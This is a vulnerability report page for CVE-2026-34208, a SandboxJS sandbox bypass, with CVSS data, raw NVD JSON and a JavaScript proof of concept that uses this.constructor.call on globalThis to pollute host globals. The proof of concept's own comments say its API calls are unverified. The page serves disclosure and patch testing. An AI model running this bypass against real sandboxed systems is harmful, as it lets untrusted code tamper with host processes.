Security Vulnerability Report
CVE-2026-34208 CVSS 10.0 CRITICAL

CVE-2026-34208

Published: 2026-04-06 16:16:35
Last Modified: 2026-04-09 18:07:21

Description

SandboxJS is a JavaScript sandboxing library. Prior to 0.8.36, SandboxJS blocks direct assignment to global objects (for example Math.random = ...), but this protection can be bypassed through an exposed callable constructor path: this.constructor.call(target, attackerObject). Because this.constructor resolves to the internal SandboxGlobal function and Function.prototype.call is allowed, attacker code can write arbitrary properties into host global objects and persist those mutations across sandbox instances in the same process. This vulnerability is fixed in 0.8.36.

CVSS Details

CVSS Score
10.0
Severity
CRITICAL
CVSS Vector
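CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L (vector from the record's Secondary source; the Primary entry in the raw JSON below rates availability impact HIGH, A:H, with the same 10.0 base score)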

Configurations (Affected Products)

cpe:2.3:a:nyariv:sandboxjs:*:*:*:*:*:node.js:*:* - VULNERABLE
SandboxJS < 0.8.36

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
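// PoC for CVE-2026-34208: SandboxJS Sandbox Bypass
// Vulnerable versions: < 0.8.36 (fixed in 0.8.36)
//
// Intended use: a regression check that an installed SandboxJS no longer lets
// sandboxed code write properties onto host global objects.
//
// Run this only as a standalone, disposable Node.js process. Per the advisory,
// a successful write lands on the host's global objects and persists across
// sandbox instances in the same process, and the payload below would replace
// globalThis.process for the rest of that process's lifetime.
//
// NOTE(review): the module name and the sandbox.run(fn) call are reproduced as
// published and have not been checked against the library's documented API.
// A negative result is therefore not proof of a patched install on its own;
// also confirm the installed version is 0.8.36 or later.
const { Sandbox } = require('sandboxjs');

/**
 * Code meant to execute inside the sandbox.
 *
 * Root cause, per the advisory: direct assignment to globals is blocked, but
 * `this.constructor` resolves to the internal SandboxGlobal function and
 * Function.prototype.call is allowed, so the constructor can be invoked with a
 * host global object as its receiver.
 */
function exploit() {
  // Define the payload object to be written to the global scope
  const payload = {
    malicious: true, // marker property checked by the verification step
    // Attempt to overwrite a global property
    process: { env: { POLLUTED: "YES" } }
  };

  // 1. Use 'this.constructor' to get a reference to the internal SandboxGlobal constructor.
  // 2. Use .call() to invoke this constructor.
  // 3. Set the 'this' context of the constructor to the actual host global object.
  // 4. Pass the payload object to merge/write properties.
  let target = globalThis;

  // Execute the bypass
  this.constructor.call(target, payload);
}

// Run the exploit inside the sandbox
const sandbox = new Sandbox();
sandbox.run(exploit);

// Verification: report both outcomes, so a run that prints nothing can only
// mean the script itself failed, not that the library is patched.
if (globalThis.malicious === true) {
  console.log("[+] PoC successful: Global object polluted.");
} else {
  console.log("[-] Marker not set: host global object unchanged.");
}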

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-34208", "sourceIdentifier": "[email protected]", "published": "2026-04-06T16:16:34.580", "lastModified": "2026-04-09T18:07:20.863", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SandboxJS is a JavaScript sandboxing library. Prior to 0.8.36, SandboxJS blocks direct assignment to global objects (for example Math.random = ...), but this protection can be bypassed through an exposed callable constructor path: this.constructor.call(target, attackerObject). Because this.constructor resolves to the internal SandboxGlobal function and Function.prototype.call is allowed, attacker code can write arbitrary properties into host global objects and persist those mutations across sandbox instances in the same process. This vulnerability is fixed in 0.8.36."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-693"}, {"lang": "en", "value": "CWE-915"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": 
false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nyariv:sandboxjs:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "0.8.36", "matchCriteriaId": "F87D3BD6-FACF-45C3-92E4-F411C229C9C6"}]}]}], "references": [{"url": "https://github.com/nyariv/SandboxJS/security/advisories/GHSA-2gg9-6p7w-6cpj", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}